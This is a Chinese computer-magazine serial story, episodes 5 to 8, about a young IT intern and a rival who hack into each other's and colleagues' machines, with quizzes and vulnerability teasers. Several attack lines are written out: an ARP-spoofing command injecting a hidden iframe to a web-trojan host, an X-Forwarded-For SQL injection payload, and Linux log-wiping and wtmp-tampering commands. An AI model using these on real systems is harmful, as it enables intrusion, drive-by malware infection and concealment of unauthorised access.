毒辣辣为了讨好MM，擅自在局域网内卖弄黑客技术，虽然初衷是好的，但方式方法却不太恰当，既容易让领导误解，又容易被别有用心的人陷害。正确的方法，应该是将局域网存在的问题、影响及危害、解决的方案先向胖哥、再向主任报告，在领导同意的情况下再操作，就不会出现这样的麻烦了。

交流互动
        每期故事中的技术，我们都会在电脑报报官方论坛数动连线（http://www.shudoo.com）安全板块中，邀请黑客营的高手进行深入的挖掘，他们是在什么情况下使用这些黑客技术的，使用过程中可能会出现什么问题，应该如何解决，精彩不容错过！
上期技术题目的答案是ARP欺骗。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜，产生了一批幸运获奖者，获奖名单请登录http://go.shudoo.com/g/hky.htm查询。
技术题目：FTP服务器常见的入侵方法有几种？
剧情题目：胖哥为什么总是针对毒辣辣（ 附上分析）？
想知道答案，请看黑黑求职记（5）。如果你想到答案了，请到http://go.shudoo.com/g/hky.htm留言或者发邮件到pcw-chendx@vip.sina.com，答对者将有机会获得我们送出的2GB防病毒闪存。


黑白配
        黑白配，男生女生配，在他们的电脑安全生活中，在攻与防中，爆笑无处不在。欢迎投稿或者提供创意，有丰厚的奖励等着你，来稿请寄pcw-chendx@vip.sina.com。
QQ被盗


黑暗竞技场
        传说，在云之彼端有一座黑暗竞技场，在竞技场里面可以随意施展黑客技术。每逢虎年，竞技场将打开大门，迎接新的勇士。来吧，来竞技场吧，来一展你的身手吧！在这里，你可以施展黑客技术；在这里，你可以与高手交流。Let’s go!

最近，phpcms2008 sp4网站管理系统爆出下载任意文件漏洞，该漏洞泄露网站的敏感数据，导致网站被黑客入侵。漏洞的出现是因为“if(preg_match(''/\.php$/'',$f) || strpos($f, ":\\")) showmessage(''地址有误''); 只判断文件后辍 PHP。如果是“xx.php ”， 多了一个空格的情况，也会被认为是 xx.php文件。
该漏洞到底如何利用？漏洞利用的具体方法是什么？大家可以将自己的研究心得发送到电脑报官方论坛数动连线（http://bbs.shudoo.com）安全板块，也可以直接写信与小编交流，来信请发到pcw-chendx@vip.sina.com。每周我们都会挑出幸运者，赠送每人一份奖品。此外，还有机会在报纸上得到推荐。
        本期奖品是安天木马防线KEY和USB连接器，奖品由安天提供，价值30元或300X币。

efujin

黑客营
毒辣辣求职记（5）
毒辣辣初入职场，就得到主任的赏识，受到老同事胖哥的嫉妒，从而处处受到他的刁难。胖哥恶人先告状，诬陷毒辣辣在局域网里面兴风作浪，主任最终是否相信胖哥，处罚毒辣辣呢？毒辣辣又会如何应对从天而降的厄运呢？
连载地址：http://go.shudoo.com/g/hky.htm

  逼到悬崖边缘
故事主角：毒辣辣
其他人物：胖哥（老资格的同事）、主任（直接领导）
本期知识点：ARP挂马攻击

故事提要：逐步冷静的毒辣辣面对胖哥的陷害，据理力争、妙语辩解，暂时化解了主任的信任危机。面对对手的咄咄逼人，毒辣辣决定针锋相对、采取措施找出胖哥入侵主任笔记本电脑的证据，为自己讨回公道。前途是光明的，道路却总是曲折的……

戳穿阴谋
主任毕竟是老江湖了，短暂的愤怒之后，逐渐冷静下来。主任认为不能单听胖哥的一面之词，于是利用胖哥外出的时机，把毒辣辣秘密地叫到自己的办公室，想全面的了解一下情况。
“毒辣辣，听说你最近很受财务室的欢迎！”
“我帮财务室的老会计解决了上网速度慢的问题……”
“就这样，没做其他的？听说你私自将公司的备用FTP服务器，改成影音下载服务器，是不是有这回事？”
毒辣辣一听主任说话的语气和话题，就感到大事不妙，自己入侵FTP服务器的事情被人打“小报告”了，可整个操作自己做得不知不觉，到底是谁出卖了自己？是老会计？不会！是紫衣MM？更不会！
冷汗从毒辣辣的额头不断往外冒，暗道：“如果今天解释不清楚，自己就完蛋了！”
“主任，其实这件事情，我一直想向你汇报，但由于你工作太忙，我还没有来得及汇报。我来公司这段时间，发现工作节奏很快，公司管理严格，很多公司员工有很大压力，容易导致情绪焦躁，长此以往会出大问题的，我想我们信息中心在这方面可以发挥优势，建立一个影音点播系统，供公司员工休息时候娱乐，为大家创造一个放松的环境……”
“这样吗？”主任的手指有规律的轻轻地敲着桌子，脸上没有透露出喜怒哀乐，“毒辣辣，你觉得奇怪不，你才来我们公司，我的笔记本电脑就出问题了……你说有人在我的笔记本电脑里面建立了隐藏账号，那人是谁?你找到了吗？”
毒辣辣的心一下子又紧了，为什么主任会怀疑我？是胖哥！此时，毒辣辣一切都明白了，胖哥一定是恶人先告状，刷他很！毒辣辣深吸一口气，冲着主任微微一笑：“主任，隐藏账号的事情，你除了告诉我，没有告诉别人吧？”
“那是当然。”
“那向你告密的那人怎么知道隐藏账号的事情？这不是‘此地无银三百两’吗?再说，隐藏帐号创建的时候，我还不认识你呢！”
毒辣辣一下抓住胖哥栽赃的破绽，让主任陷入了沉思。
毒辣辣继续说道：“主任，FTP服务器的事情是我做得不对，没有及时汇报，还请你谅解。你笔记本电脑中的隐藏账号，我一定会尽快查清楚，掌握实质证据后向你汇报……”

针锋相对
听了毒辣辣的解释，主任依然毫无表情，他点点头：“你先出去吧！”
回到办公室，毒辣辣端起水杯，猛灌了一气，终于感觉不到主任的压力了，他坐下后回忆着此前的对话：“打小报告的人一定是胖哥，可为什么他知道我入了FTP服务器，他有没有千里眼。等等，难倒是他在我的电脑中种植了木马？”
毒辣辣调出嗅探工具，利用该工具来分析自己电脑与外面的所有通信。很快毒辣辣就发现了一个可疑的通信，通过深入的分析，发现通信的IP地址应该是信息中心的。到此，毒辣辣彻底明白了是谁在捣鬼。
现在当务之急是要揪出木马，毒辣辣在安全模式下调用杀毒软件进行全盘查杀，扫描结束后，一个病毒也没有找到，看来木马进行了免杀，逃过了杀毒软件的查杀。毒辣辣哼了一声，调出安全辅助工具，不多久就揪出了木马。
满腔怒火的毒辣辣：“养鸟的居然被鸟耍了！”，他调出扫描工具，输入此前查到的IP地址，进行远程分析。胖哥电脑的安全防护做的还是不错，拦截了Ping命令，关闭了3389、445等高危端口，远程溢出工具也没有作用。
“胖哥电脑防范的如此严密，常规的入侵方法看来是不行了，我的想想其他的招！”

再遭陷害
毒辣辣还有没有考虑好用什么方法入侵胖哥的电脑，又接到主任的电话去他的办公室。
“上午的网络视频会议因为局域网的ARP问题而中断了几分钟，局域网内的很多电脑打开网页就报警有网页木马，这个事情你知道吧？”
“我好像听说了，主任需要我去调查ARP攻击源吗？”
“不用了，ARP攻击源已经找到了，是你的电脑，你自己看看吧！”
毒辣辣接过分析报告，一看大惊失色，ARP攻击源的IP地址就是自己电脑的，可自己明明没有发动过ARP攻击。毒辣辣看到分析报告末尾的署名，顿时明白是胖哥又一次在陷害自己。
原来，上午胖哥找了一个借口支开了毒辣辣一小会，然后选择了一个网页木马生成器，制作了一个网页木马，将网页木马偷偷传入毒辣辣的电脑中，然后在毒辣辣电脑中准备开启HTTP服务。
胖哥下载了一款Web服务器软件Baby Web Server，点击“服务→设置”， 在“网页目录”中添加网页木马位置，再点击“Start”开启HTTP服务。做到这里还没有完，胖哥远程传入ARP欺骗工具zxARPs，然后进入zxARPs目录输入命令：zxARPs.exe -idx 0 -ip 192.168.4.7-192.168.4.222 -port 80 -insert \"<iframe src=&#39;http://192.168.4..3/dll.htm&#39; width=0 height=0>\"，192.168.4.3是毒辣辣电脑的IP地址。
由于胖哥的作祟，毒辣辣电脑闯下了大祸，毒辣辣又将如何面对主任，如何解释呢？下集不容错过。

职场点评
本期主任和毒辣辣的对话十分精彩，从中我们可以得到很多职场经验。
1.控制情绪。主任做的十分老练到位。在任何时候都是冷静、理性处理问题。切记冲动是魔鬼，尤其是职场新手更要注意这一点。
2.汇报沟通的技巧。职场之中，与领导、同事、客户等的沟通协调是很重要的工作方式方法，职场新手一定要有针对性的进行系统训练。本期毒辣辣在向主任解释过程中，先为自己的行为找到一个合情合理的理由，再抓住破绽、反戈一击，批驳胖哥观点的逻辑漏洞，最后降低姿态、自我检讨，给领导一个下台的台阶。大家可以举一反三，在实际工作中进行训练和应用。

交流互动
        每期故事中的技术，我们都会在电脑报官方论坛数动连线（http://bbs.shudoo.com）安全板块中，邀请黑客营的高手进行深入的挖掘，他们是在什么情况下使用这些黑客技术的，使用过程中可能会出现什么问题，应该如何解决，精彩不容错过！
上期技术问题的答案是4种。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜，产生了一批幸运获奖者，获奖名单请登录http://go.shudoo.com/g/hky.htm查询。
技术题目：如何定位ARP病毒源？
剧情题目：主任还会相信毒辣辣吗（ 附上分析）？
想知道答案，请看毒辣辣求职记（6）。如果你想到答案了，请到http://go.shudoo.com/g/hky.htm留言或者发邮件到pcw-chendx@vip.sina.com，答对者将有机会获得我们送出的2GB防病毒闪存。



黑白配
        黑白配，男生女生配，在他们的电脑安全生活中，在攻与防中，爆笑无处不在。欢迎投稿或者提供创意，有丰厚的奖励等着你，来稿请寄pcw-chendx@vip.sina.com。
编写批处理
         


黑暗竞技场
        传说，在云之彼端有一座黑暗竞技场，在竞技场里面可以随意施展黑客技术。每逢虎年，竞技场将打开大门，迎接新的勇士。来吧，来竞技场吧，来一展你的身手吧！在这里，你可以施展黑客技术；在这里，你可以与高手交流。Let’s go!

STCMS是由PHP+MySQL开发的音乐系统，该系统在网上被广泛使用。该系统的V3.3版本爆出注入漏洞，黑客利用该漏洞就可以直接获得网站管理员的密码，利用管理员的账号和密码就可以登录网站后台，到了这里，想挂马就挂马、想发钓鱼网站链接就发钓鱼网站链接。
导致漏洞出现的原因是系统没有过滤$_SERVER，黑客可以伪造$_SERVER[X-FORWARDED-FOR]，从而将恶意代码（X-Forwarded-For: 127.0.0.1'',(select pwd from stcms_admin where id =1))#）注入数据库中，从而爆出管理员的密码。
该漏洞到底如何利用？漏洞利用的具体方法是什么？大家可以将自己的研究心得发送到电脑报官方论坛数动连线（http://bbs.shudoo.com）安全板块，也可以直接写信与小编交流，来信请发到pcw-chendx@vip.sina.com。每周我们都会挑出幸运者，赠送每人一份奖品。此外，还有机会在报纸上得到推荐。
        本期奖品是安天木马防线KEY和USB连接器，奖品由安天提供，价值30元或300X币。

efujin

黑客营
毒辣辣求职记（6）
毒辣辣初入职场，就得到主任的赏识，受到老同事胖哥的嫉妒，一次又一次的设计害毒辣辣。如今主任对毒辣辣的信任已经动摇了，并怀疑毒辣辣心存不轨。面对胖哥泼来的污水，毒辣辣应该如何为自己辩解呢？毒辣辣又该如何翻身呢？
连载地址：http://go.shudoo.com/g/hky.htm

  猎人与狐狸的周旋
故事主角：毒辣辣
其他人物：胖哥（老资格的同事）、主任（直接领导）、紫衣MM（会计）
本期知识点：用黑客工具扫描局域网共享资源

故事提要：面对胖哥接二连三的诬陷，毒辣辣感到巨大的压力，主任逐渐对自己丧失了信心，如果自己再不行动，难逃主任的责难不说，实习期满后要想留下来就更不可能了。破釜沉舟的毒辣辣，决定展开反击，一场猎人和狐狸的战争开始了……

最后一次信任
毒辣辣看到手中的调查报告，又惊又怒又恨又悔。惊的是，胖哥为了诬陷自己不择手段，竟敢使用ARP病毒，完全不考虑视频会议是不是会中断；怒的是，胖哥不但不指点，还处处为难自己；恨的是，自己没有早点动手，找到胖哥入侵主任笔记本电脑的证据，导致现在处处受制；悔的是，自己已经清除了电脑中的木马，不然还可以展示给主任看，让主任知道自己的电脑是被远程操控发动ARP攻击的，现在有口也说不清楚了。
“毒辣辣，我希望你给我一个合理的解释，为什么ARP攻击源是你的电脑？”主任阴沉着问道，“你千万不要告诉我，是电脑中毒导致的。我问了，用ARP方式在局域网挂马一定要精心策划。”
“主任，我是被陷害的，我……”
“谁陷害你，又是胖哥？”
“我认为……”
“你有什么证据说是胖哥陷害你？”
“主任，假设真是我做的，我在释放病毒的时候，会留下这么明显的痕迹吗？我一定会进行善后工作的。就算用自己的电脑发动攻击，IP地址我也一定会改的。再说，我发动攻击的目的是什么？我又能从中得到什么好处？”
而且这接二连三的诡异事件，都发生在一个实习生头上，主任也觉得有问题，但胖哥一直是信息中心的权威，他的话主任也不能不信。
主任摘下眼镜，冷冷地说：“我再给你一次机会，再相信你一次，你拿出证明你清白的证据。我不能想这些事情再牵扯信息中心过多的时间和精力，你明白吗？这是最后的机会！”
毒辣辣从主任严厉的话语中感受到了压力和危机，自己已经没有什么退路了，只能发挥自己的聪明才智，放手一搏了，为了自己的清誉，为了实习期满可以留下来工作，为了紫衣MM那甜美的笑容……

为“狐狸”挖的陷阱
        上次扫描胖哥的电脑，基本上没有发现可利用东东，毒辣辣坐在座位上想其他的方法。用木马是最好的方法，可怎么让胖哥中招却是难题，传送文件？NO，胖哥一定不会上当的。网页挂马？太复杂了。到底怎么办呢？毒辣辣陷入沉思。
        “毒辣辣，听说你挨骂了，到底什么事搞得这么惨？”紫衣MM在QQ上询问毒辣辣。
        “被人陷害了，我正在想方法对付他！”
        “找到方法了吗？”
        “没有！他现在躲在乌龟壳中，我是一筹莫展。”
        “你好笨，你不会引他走出乌龟壳吗？”
        啪！毒辣辣兴奋地打了一个响指，可以挖以一个共享文件的陷阱，等胖哥自投罗网。胖哥管理局域网，说不定会时常扫描共享的文件，复制他感兴趣的东东，节省了下载时间和寻找时间。
这种事情毒辣辣以前在学校的时候经常干，毒辣辣凭直觉判断胖哥也有这个习惯。于是毒辣辣调查扫描工具超级网络邻居，该工具可以局域网内的共享资源，包括FTP中的资源。 输入IP地址段开始扫描，就可以看到软件扫描出来的共享文件和文件夹。
经过筛选，毒辣辣锁定了3个目标电脑，它们都有一个共同的特征，那就是都有很多已经完和未下载完的电影、电视剧，毒辣辣决定入侵3个目标电脑分别查找线索。经过2个小时的辛苦，排除了2个目标，只剩下最后一台目标电脑。
毒辣辣扫描最后一台目标电脑，发现它开启了3389端口，这可省事多了。毒辣辣生了一个懒腰，微笑着登录远程桌面，随意输入几个常见的用户名，例如guest、new，密码为空进行尝试，很看就看到桌面了。
毒辣辣在目标电脑中找到了一个后门，又发现后门经常连接的IP地址，就是胖哥的。终于找到了！毒辣辣深吸一口气，平抑一下激动的心情，决定采用猎人追捕狐狸的办法——在狐狸出没的路径中设下陷阱，出其不意、攻其不备。
毒辣辣想到做到，立即在这台电脑的共享文件夹中伪造了一个捆绑有木马的视频，视频名称取得非常有诱惑力。最后，毒辣辣将自己登录这台机器的痕迹清除干净，悄悄地离去。

上套的“狐狸”
接下来两天，风平浪静，工作像往常一样进行，虽然外表看似平静，但毒辣辣却心急如焚，留给自己的时间可不多，主任的耐心都快耗没了，而“狐狸”却还没有上钩。但毒辣辣知道，现在绝对不能自乱阵脚、打草惊蛇，任何的草率行事都可能前功尽弃。
终于，胖哥在周五下午即将下班的时候，访问了这个共享目录，对毒辣辣留下的视频非常感兴趣，他没有任何防备地复制浏览了视频，当他把注意力集中于视频时，隐藏在视频中的木马已经悄然激活，控制了胖哥的电脑，而此时胖哥还浑然不知……

职场点评
职场之中，说话要讲事实、讲证据，不能无端的猜测和随意的指责。毒辣辣一直拿不出胖哥陷害他的证据，也拿不出胖哥入侵主任笔记本电脑的证据，一直无法让主任完全相信自己，在这方面，毒辣辣吃亏了。
人际关系是这样，各项工作也是这样，凡事都要搞清楚、弄准确，不能大而化之想当然。人际关系中的盲目猜测，往往不利于团结，并会给领导留下不稳重、不严谨的印象，而实际工作中的粗心大意，往往给工作带来被动，造成不应该的失误。

交流互动
        每期故事中的技术，我们都会在电脑报官方论坛数动连线（http://bbs.shudoo.com）安全板块中，邀请黑客营的高手进行深入的挖掘，他们是在什么情况下使用这些黑客技术的，使用过程中可能会出现什么问题，应该如何解决，精彩不容错过！
上期技术问题的答案是通过路由器定位病毒源。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜，产生了一批幸运获奖者，获奖名单请登录http://go.shudoo.com/g/hky.htm查询。
技术题目：如果共享的文件夹加密了，有方法可以PJ吗？
剧情题目：胖哥会识破毒辣辣的伎俩吗（ 附上分析）？
想知道答案，请看毒辣辣求职记（7）。如果你想到答案了，请到http://go.shudoo.com/g/hky.htm留言或者发邮件到pcw-chendx@vip.sina.com，答对者将有机会获得我们送出的2GB防病毒闪存。

黑白配
        黑白配，男生女生配，在他们的电脑安全生活中，在攻与防中，爆笑无处不在。欢迎投稿或者提供创意，有丰厚的奖励等着你，来稿请寄pcw-chendx@vip.sina.com。

极品QQ号


黑暗竞技场
        传说，在云之彼端有一座黑暗竞技场，在竞技场里面可以随意施展黑客技术。每逢虎年，竞技场将打开大门，迎接新的勇士。来吧，来竞技场吧，来一展你的身手吧！在这里，你可以施展黑客技术；在这里，你可以与高手交流。Let’s go!

最近，phpcms建站系统又爆出注入漏洞，该漏洞会导致网站被黑客入侵，影响2.0版本。漏洞出现的原因是，Help.php 文件存在安全检测不严的问题，对黑客提交的数据过滤不严。导致漏洞出现的关键代码如下：
//转义处理客户端提交的数据
if(!get_magic_quotes_gpc())
{
        $_POST   = stripslashes_deep($_POST);
        $_GET    = stripslashes_deep($_GET);
        $_COOKIE = stripslashes_deep($_COOKIE);
}
该漏洞到底如何利用？漏洞利用的具体方法是什么？大家可以将自己的研究心得发送到电脑报官方论坛数动连线（http://bbs.shudoo.com）安全板块，也可以直接写信与小编交流，来信请发到pcw-chendx@vip.sina.com。每周我们都会挑出幸运者，赠送每人一份奖品。此外，还有机会在报纸上得到推荐。
        本期奖品是安天木马防线KEY和USB连接器，奖品由安天提供，价值30元或300X币。

efujin

黑客营
毒辣辣求职记（7）
毒辣辣初入职场，就得到主任的赏识，受到老同事胖哥的嫉妒，他一次又一次地设计陷害毒辣辣。为了证明自己的清白，为了证实自己的猜想，毒辣辣决定入侵胖哥的电脑，一步一步查出真相。调查过程会一帆风顺吗？会碰到哪些困难？
连载地址：http://go.shudoo.com/g/hky.htm

  关乎命运转折的发现
故事主角：毒辣辣
其他人物：胖哥（老资格的同事）、主任（直接领导）、紫衣MM（会计）
本期知识点：Word文档的加密和解密

故事提要：毒辣辣进入公司实习有一段时间了，是时候正式分配任务了，胖哥财务部的网络维护的重任就毒辣辣，他获得了更多接触紫衣MM的机会。毒辣辣在出色完成工作的同时，加紧了对胖哥的调查。工夫不负有心人，毒辣辣在胖哥电脑中有了至关重要的发现……

委以“重任”
尽管出现了许多插曲和桥段，但毒辣辣在信息中心这一段时间出色的表现，还是得到了主任的认可。主任考虑正式让毒辣辣独立负责一块业务，为此特招来胖哥进行商量。
“小胖，毒辣辣来我们这里有一段时间了，你打算这么安排他？”
胖哥一听主任的话，就大致猜到主任的打算，他并不希望给毒辣辣具体的工作，最好毒辣辣打杂到实习期结束走人，既然主任有意让毒辣辣多做一点事情，他也只好顺水推舟，给毒辣辣安排一个正式的任务：“得让毒辣辣那小子干一些吃力不讨好的活！”
“毒辣辣技术水平确实不错，不过，有时喜欢耍点小聪明，有点滑头……”胖哥眯着眼睛，字斟句酌地说道，“毒辣辣此前做事情，有的不错，有的就有欠思考，我建议我磨练磨练，让他先管理咱们中心的设备，你看怎么样？”
“管设备，是不是大材小用了？我看毒辣辣技术不错，让他负责视频会议……”
“主任，这可能有点不太合适。”胖哥听到主任的，感到不妙，主任想对毒辣辣委以重任，这是胖哥不愿意看到的，他可不希望毒辣辣这种“不懂事”的孩子出风头。
“毒辣辣喜欢捣鼓黑客技术，将视频会议这么重要的任务交给他我有点不放心，万一出了岔子，我们可不好交代。”
听到胖哥的回答，主任陷入了沉思，手指有规律地敲打着桌面，眼光盯着胖哥一动不动。胖哥依然露出憨厚的笑容，坦然面对主任的目光。
“你的担忧不无道理，视频会议这么重要的工作的确不太适合他……”
“主任，要不这样，将18楼的财务室的网络维护交与毒辣辣负责，这两个部门的网络经常出莫名其妙的问题，也可以锻炼一下毒辣辣独自处理时间问题的能力。”
“就找你说的办吧！”

可疑的文档
当胖哥通知毒辣辣任务时，毒辣辣就知道胖哥不安好心，在信息中心呆了有一段时间了，他知道财务室的人大多电脑安全知识不强，时不时就有人的电脑中毒，影响局域网，此外少部分人特别喜欢下载电影、电视剧，占用了宽带资源，影响了网速。
这个任务极难解决，又不容易得到领导的赏识。不过既然任务已经布置下来了，毒辣辣打起十二分精神，准备大干一场。此时，毒辣辣QQ上紫衣MM的头像闪动了。
“听说你以后我们办公室的网络，是不是真的？”
“你怎么知道的？我几分钟前才知道。”
“你不看看我是谁。我们办公室的网速太慢，影响我偷菜，你一定要帮我解决！”
“八卦女，放心吧，我一定做到，你还是相信怎么谢我！此外，你帮我收集一下财务室哪些人喜欢下载东东，有哪些人电脑没有安装安全软件。”
“喵喵……”
有紫衣MM帮忙收集情报，毒辣辣送了一口气，看到胖哥去走廊吸烟，他决定通过植入胖哥电脑中的木马寻找蛛丝马迹，之所以要等胖哥离开电脑，是怕他察觉电脑中有木马。在胖哥电脑搜查时，毒辣辣发现一个特殊的隐藏属性的Word 2003文档，该文档名称是“手册”。双击文档，里面显示的都是乱码。
看到这里，毒辣辣一愣，该文档没有用Word自带功能的加密（图1），也没有使用第三方加密工具加密，竟然用代码加密，这可不好办了。如果是Word自带功能的加密，可以使用Advanced Office Password Recovery（图2）、Word Password Recovery Master之类工具清除密码，它们可以通过暴力PJ、猜解密码等方式得到密码。
  
如果是用第三方工具加密的，PJ的可能性就较低了，但毒辣辣可以通过木马截获胖哥输入的密码。现在怎么办呢？凭直觉毒辣辣肯定这个神秘的Word2003文档是证明自己清白的重要证据，无论如何也要看到里面的内容。

迷惑的信息
毒辣辣静下来思考，该文档加密的方法一定不会很复杂，用的语言应该是胖哥熟悉的编程语言。经过深入分析，毒辣辣终于确定该文档使用了异或加密，于是着手编写了一个解密代码，代码如下所示：
        private void button_Click(object sender, EventArgs e)
        {
            byte key = * * * * ;
            button. Word = encryptDecryptStr(Word, key);
        }
运行代码后，毒辣辣看到了文档中的内容，可是看到内容后，他反而糊涂了：“胖哥记录都是什么乱七八糟的东东？”
胖哥这么看重的文档，怎么可能都是不良信息？看着不良信息，毒辣辣陷入了沉思，突然，他眼睛一亮，眼前的信息不在不良……
毒辣辣到底想到了什么？文档有暗藏什么玄机？请看下集分解。

职场点评
在上文中，胖哥故意将吃力不讨好的活交给新人毒辣辣，小小的阴了毒辣辣一把。在职场，新人吃点小亏是很常见的事情，千万不要乱发脾气，一定要“大事化小，小事化了”， 不惹事端，多考虑领导的安排、同事的感受，多想想如何将工作做好，这有助于以后工作的发展。
很多人初涉职场的大学生，容易抱怨“吃的是杂粮，干的是杂活，做的是杂人”，而很少想到如何化被动为主动，转“亏”为“福”，如何干好手中的工作，让杂活也出彩，给自己加分。好的表现，领导是不会忽略的。
毒辣辣接到任务安排，也知道自己是吃亏了，可他没有抱怨，努力做好这份工作，虽然当前还没有成效，但他的认真的态度会逐步得到领导和同事的认可。所以，有时候在职场，吃亏也是一种福。

交流互动
        每期故事中的技术，我们都会在电脑报官方论坛数动连线（http://bbs.shudoo.com）安全板块中，邀请黑客营的高手进行深入的挖掘，他们是在什么情况下使用这些黑客技术的，使用过程中可能会出现什么问题，应该如何解决，精彩不容错过！
上期技术问题的答案是有间接的方法可以PJ。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜，产生了一批幸运获奖者，获奖名单请登录http://go.shudoo.com/g/hky.htm查询。
技术题目：异或加密的原理是什么？
剧情题目：Word中藏有什么秘密（ 附上分析）？
想知道答案，请看毒辣辣求职记（8）。如果你想到答案了，请到http://go.shudoo.com/g/hky.htm留言或者发邮件到pcw-chendx@vip.sina.com，答对者将有机会获得我们送出的2GB防病毒闪存。


黑白配
        黑白配，男生女生配，在他们的电脑安全生活中，在攻与防中，爆笑无处不在。欢迎投稿或者提供创意，有丰厚的奖励等着你，来稿请寄pcw-chendx@vip.sina.com。
粉碎文件


黑暗竞技场
        传说，在云之彼端有一座黑暗竞技场，在竞技场里面可以随意施展黑客技术。每逢虎年，竞技场将打开大门，迎接新的勇士。来吧，来竞技场吧，来一展你的身手吧！在这里，你可以施展黑客技术；在这里，你可以与高手交流。Let’s go!

最近，DedeCms V5.6建站系统爆出注入漏洞，该漏洞会导致网站被黑客攻击。漏洞出现的原因是plus/advancedsearch.php $sql 变量未初始化。导致漏洞出现的关键代码如下：
if($mid == 0)//必须绕过限制
{
showmsg(''参数不正确，高级自定义搜索必须指定模型ID'', ''javascript'');
exit();
}
$query = "select maintable, mainfields, addontable, addonfields, template from    dede_advancedsearch where mid=''$mid''";

该漏洞到底如何利用？漏洞利用的具体方法是什么？大家可以将自己的研究心得发送到电脑报官方论坛数动连线（http://bbs.shudoo.com）安全板块，也可以直接写信与小编交流，来信请发到pcw-chendx@vip.sina.com。每周我们都会挑出幸运者，赠送每人一份奖品。此外，还有机会在报纸上得到推荐。
        本期奖品是安天木马防线KEY和USB连接器，奖品由安天提供，价值30元或300X币。

efujin

黑客营
毒辣辣求职记（8）
毒辣辣初入职场，就得到主任的赏识，受到老同事胖哥的嫉妒，他一次又一次地设计陷害毒辣辣。毒辣辣发动了反击，入侵了胖哥的电脑，在里面发现了重要的信息。毒辣辣正逐渐接近真相，胖哥的秘密将一览无遗。
连载地址：http://go.shudoo.com/g/hky.htm

惊天秘密 浮出水面
故事主角：毒辣辣
其他人物：胖哥（老资格的同事）、主任（直接领导）、紫衣MM（会计）
本期知识点：Linux服务器入侵痕迹清除

故事提要：毒辣辣从胖哥电脑的神秘文档中，发现了新的线索，根据线索找到了胖哥在备用Linux服务器中隐藏的EXCEL文档，里面的记录信息让毒辣辣震惊不已。EXCEL文档到底记载了什么不可告人的迷秘密？

点醒梦中人
眼前的不良信息，不再不良，毒辣辣从中提取出很多重要信息。每隔一个月胖哥就会在文档中添加一条信息，每条信息中都有一组奇怪的文字，例如小楼一夜听春雨、天外流星、青青、铁燕夫人等。
做到这一步，毒辣辣还是感到迷茫，直觉告诉他，这些奇怪的文字都是有所关联的，与他追寻的真相也密切相关。文字中到底暗藏了什么信息？胖哥记录这些信息绝不会好玩，肯定有阴谋！
“小楼一夜听春雨是一首诗、天外流星是一个现象，青青、铁燕夫人肯定是在说人……乱七八糟的东东，我都要疯了！”一筹莫展的毒辣辣快要崩溃了。
此时，胖哥走到毒辣辣身边，皱着眉头批评毒辣辣：“财务室不是你负责吗？你怎么没有去维护数据库？”
“维护数据库？数据库出故障了？没有人通知我！”
“你不是有信息中心办公平台的账号吗？你不会自己去看?你现在有具体任务了，每天都要登录平台看看有没有你的任务。”
“我马上去看看。”
“这次任务你没有及时出工，我会记录下来，下不为例。”
“……”
毒辣辣无比郁闷，才正式接手工作，就被记过一次，看到胖哥的背影，毒辣辣恨得牙痒痒：“等我揭开你真面目了，看你还敢阴我！哼哼！”
毒辣辣来到财务室维护数据库服务器，与紫衣MM再次相遇，经过几分钟的努力，毒辣辣排除了故障，紫衣MM等人的电脑终于成功连接上了数据服务器。紫衣MM俏皮地表扬道：“还不赖，这么快就搞好了。故障都排除了，你怎么还是愁眉苦脸的？”
“小楼一夜听春雨、天外流星、青青、铁燕夫人，你说这几组文字代表了什么？我头疼了一个上午，就为找出它们的交集发愁！”毒辣辣把事情的经过告诉了紫衣MM，对她也没有什么好隐藏的，正好死马当活马医说不定紫衣MM可以想到答案。
“小楼一夜听春雨，这不是古龙《圆月弯刀》中的那首诗吗？”
“这是宋代诗人陆游的《临安春雨初霁》的诗句，关古龙什么事情？”
“当然有关，青青、铁燕夫人是《圆月弯刀》你们的人物，古天乐演的电视剧，你没有看，我跟你说……”
一句惊醒梦中人，神秘的文档在毒辣辣眼中不再神秘。

胖哥的秘密
为了证实自己的猜想，毒辣辣回到自己的办公室然后在网上搜索《圆月弯刀》，核对后发现每条信息都与《圆月弯刀》有关，终于找到交集点了。
“圆月弯刀、圆月弯刀，圆月？”毒辣辣若有所思地调出信息中心分配表，你们记录了所有电脑、服务器的名称和IP地址。没有多久，毒辣辣就找到了目标，名称为圆月的应急服务器，就是它了！
剩下的就不难猜了，每组文字的拼音就是密码，例如小楼一夜听春雨的拼音是xlyytfy，密码应该是xlyytfy。毒辣辣输入圆月服务器的IP地址，输入最新的密码后成功登录，他没有猜错！
“服务器中一定藏有胖哥的秘密！他每个月改变一次登录密码，真的是煞费苦心！”毒辣辣开足马力，在服务器中疯狂寻找一切可疑的东东，不懈努力他发现了一个加密的Excel文档。
又要PJ！好在毒辣辣已经掌握了胖哥的加密规律，数分钟就PJ了Excel看到了里面的内容。看到Excel中的内容，毒辣辣惊得目瞪口呆：文档中记录了大量IP地址中的隐藏账号信息。
其中一个IP地址，毒辣辣非常熟悉是紫衣MM的电脑。“怪不得我给紫衣MM安装PSP终结者胖哥会知道，原来他早就可以控制紫衣MM的电脑了，真是十足卑鄙的小人！”毒辣辣异常愤怒。
毒辣辣收藏了Excel，接着准备清除入侵服务器（Linux）的痕迹。毒辣辣通过touch /dev/shm/timestamp; touch -r access_log /dev/shm/timestamp;sed'/192.168.4.3/d' access_log > /dev/shm/backlog ; cat/dev/shm/backlog > access_log; touch -r /dev/shm/timestamp./access_log ;shred -n 255 -z -u /dev/shm/timestamp;命令删除服务器中的日志，192.168.4.3是毒辣辣电脑的IP地址。
毒辣辣接着将wtmp文件中的登录信息进行了窜改，伪装成上次管理员登录的IP地址和时间，这样如果胖哥不细看的话，很难发现该服务器被人闯入过。需要注意的是，除了手动删除日志，可以借助一些日志小工具清除日志。

暗生情愫
清除入侵痕迹后，毒辣辣第一时间奔向紫衣MM，索要不菲的“咨询费、保密费、营养费、劳务费”之后，帮紫衣MM清除了隐藏账号。毒辣辣的表现，令紫衣MM刮目相看，一股难以言语的好感涌上心头。
在紫衣MM的帮助下，毒辣辣惊奇地发现，那些被添加了隐藏帐号的电脑，都是公司里面的高层和核心要害部门成员使用的。胖哥到底是什么人？他这么做的意图又是干什么？

职场经验点评
本期毒辣辣与紫衣MM已经擦出好感的火花，要不了多久两人就会涉及职场恋爱。关于职场爱情的问题，历来争议颇多——是否会影响工作效率，如果职场恋爱不注意以下几条很容易带来坏的影响。
